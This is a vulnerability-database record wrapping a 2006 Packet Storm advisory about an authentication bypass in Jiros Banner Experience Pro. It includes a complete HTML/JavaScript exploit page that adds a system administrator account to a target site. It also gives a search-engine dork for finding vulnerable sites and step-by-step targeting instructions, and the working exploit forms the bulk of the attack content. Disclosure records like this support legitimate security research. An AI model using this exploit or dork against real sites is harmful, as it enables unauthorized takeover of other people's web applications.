{"id": "PACKETSTORM:44533", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Jiros.txt", "description": "", "published": "2006-03-10T00:00:00", "modified": "2006-03-10T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/44533/Jiros.txt.html", "reporter": "Mustafa Can Bjorn", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:26:32", "viewCount": 10, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/44533/Jiros.txt", "sourceData": "`--Security Report-- \nAdvisory: Jiros Banner Experience Pro Remote Privilege Escalation. \n--- \nAuthor: Mustafa Can Bjorn \"nukedx a.k.a nuker\" IPEKCI \n--- \nDate: 07/03/06 04:52 AM \n--- \nContacts:{ \nICQ: 10072 \nMSN/Email: nukedx@nukedx.com \nWeb: http://www.nukedx.com \n} \n--- \nVendor: Jiros (http://www.jiros.net) \nVersion: 1.0 and prior versions must be affected. \nAbout: Via this method remote attacker can by pass security control of system \nand edit all options. \nLevel: Critical \n--- \nHow&Example: \nSecurity control in admin panel's index did not sanitized properly. \nGET/EXAMPLE -> http://[victim]/[JBPSDir]/files/ wtih this example remote attack \nbypasses security control, \nbut s/he will get some errors because ; s/he did not logged in system and doesnt \nhave admin cookies so lets add a new \nadmin account :) \nGET/EXAMPLE -> http://[victim]/[JBPSDir]/files/addadmin.asp so with this example \nremote attacker can make admin account \nsuccesfully and when he logins via http://[victim]/[JBPSDir]/files/login.asp can \ntake whole system control. \n--- \nTimeline: \n* 07/03/2006: Vulnerability found. \n* 07/03/2006: Contacted with vendor and waiting reply. \n--- \nExploit: \nhttp://www.nukedx.com/?getxpl=19 \nWith this exploit remote attacker can make new admin account. \n \n<html> \n<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title> \n<body bgcolor=\"#000000\"> \n<style> \n.xpl {font-family:tahoma; font-size:11px; text-decoration: none;} \n</style> \n<script language=\"JavaScript\"> \nfunction jbxpl() { \nif (document.xplt.victim.value==\"\") { \nalert(\"Please enter site!\"); \nreturn false; \n} \nif (confirm(\"Are you sure?\")) { \nxplt.action=\"http://\"+document.xplt.victim.value+\"files/update.asp?Action=AddAdmin\"; \nxplt.aName.value=document.xplt.aName.value; \nxplt.aEmail.value=document.xplt.aEmail.value; \nxplt.aPassword.value=document.xplt.aPassword.value; \nxplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value; \nxplt.aIsActive=document.xplt.aIsActive.value; \nxplt.submit(); \n} \n} \n</script> \n<strong> \n<font class=\"xpl\" color=\"#00FF40\"> \n<pre> \n<center> \nWelcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit \nThis exploit has been coded by nukedx \nYou can found original advisory on http://www.nukedx.com/?viewdoc=19 \nDork for this exploit: <u>inurl:JBSPro</u> \nYour target must be like that: www.victim.com/Path/ \nThe sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp \nIf the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/ \nFor second example your target must be www.victim.com/ \nYou can login with your admin account via www.victim.com/JBSPath/files/login.asp \nHave phun \n<form name=\"xplt\" method=\"POST\" onsubmit=\"jbxpl();\"> \nTarget -> <input type=\"text\" name=\"victim\" value=\"www.victim.com/Path/\" size=\"44\" class=\"xpl\"> \n<input type=\"text\" name=\"aName\" value=\"Enter Username\" class=\"xpl\" size=\"30\"> \n<input type=\"text\" name=\"aEmail\" value=\"Enter Email\" class=\"xpl\" size=\"30\"> \n<input type=\"text\" name=\"aPassword\" value=\"Enter Password\" class=\"xpl\" size=\"30\"> \n<input type=\"hidden\" name=\"aIsSystemAdmin\" value=\"True\"> \n<input type=\"hidden\" name=\"aIsActive\" value=\"True\"> \n<input type=\"submit\" value=\"Send\" class=\"xpl\"> \n</form> \n</pre> \n</font> \n</strong> \n</body> \n</html> \n \nSave this code as .htm and then execute. \n \n# nukedx.com [2006-03-07] \n \n \n \n--- \nDorks: \ninurl:JBSPro \n--- \nOriginal advisory: http://www.nukedx.com/?viewdoc=19 \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645419206}}